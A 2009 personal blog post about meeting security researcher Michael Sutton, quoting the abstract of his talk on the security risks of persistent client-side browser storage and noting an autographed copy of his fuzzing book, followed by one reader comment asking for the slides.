Thursday, July 16, 2009

A Wolf in Sheep's Clothing

Got a chance to meet Michael Sutton in person. He is in town to give a presentation on "A Wolf in Sheep's Clothing: The Dangers of Persistent Web Browser Storage". He talks about the danger on Web application that uses Client-side storage, which getting common in web application using HTML 5 and Google Gears.

Abstract of his presentation:
As the line between desktop and web applications becomes increasingly blurry in a web 2.0 world, browser functionality is being pushed well beyond what it was originally intended for. Persistent client side storage has become a requirement for web applications if they are to be available both online and off. This need is being filled by a variety of technologies such as persistent cookies, Flash storage and Google Gears. While all such technologies offer great promise, it is clear that the vast majority of developers simply do not understand their security implications.

Researching a variety of currently deployed implementations of these technologies has revealed a broad scope of vulnerabilities with frightening implications. Now attackers can target victims not just once, but every time they visit a site as the victim now carries and stores the attack with them. Imagine a scenario whereby updated confidential information is forwarded to an attacker every time a victim interacts with a given we application. The attacker no longer needs to worry about timing their attacks to ensure that the victim is authenticated as the victim attacks himself! Limited storage? Cookies that expire? Not a problem when entire databases are accessible with virtually unlimited storage and an infinite lifespan. Think these attacks are theoretical? Think again. In this talk we dive into these technologies and break down the risk posed by them when not properly understood. We will then detail a variety of real-world vulnerabilities that have been uncovered, including a new class of cross-site scripting.

If you wanted to know more or looking for the presentation slides, feel free to download here.

Michael Sutton is a regular speaker in Security conference like BlackHat and Defcon. He is also the co-author of the book "Fuzzing: Brute Force Vulnerability Discovery" (which i happens to own one). I took the opportunity to get his autograph on my book (Shown below).

Fuzzing: Brute Force Vulnerability DiscoveryAutograph from Michael Sutton

1 comment:

freebiesutopia said...

I am interested with the slides can send to my email, thank you.